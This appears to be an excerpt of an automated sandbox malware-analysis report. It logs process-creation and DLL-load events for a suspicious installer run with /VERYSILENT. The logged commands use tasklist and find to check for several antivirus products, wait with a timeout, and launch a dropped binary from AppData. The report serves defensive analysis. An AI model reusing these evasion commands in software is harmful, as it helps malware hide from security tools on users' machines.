              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp "C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp "C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$A005E,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
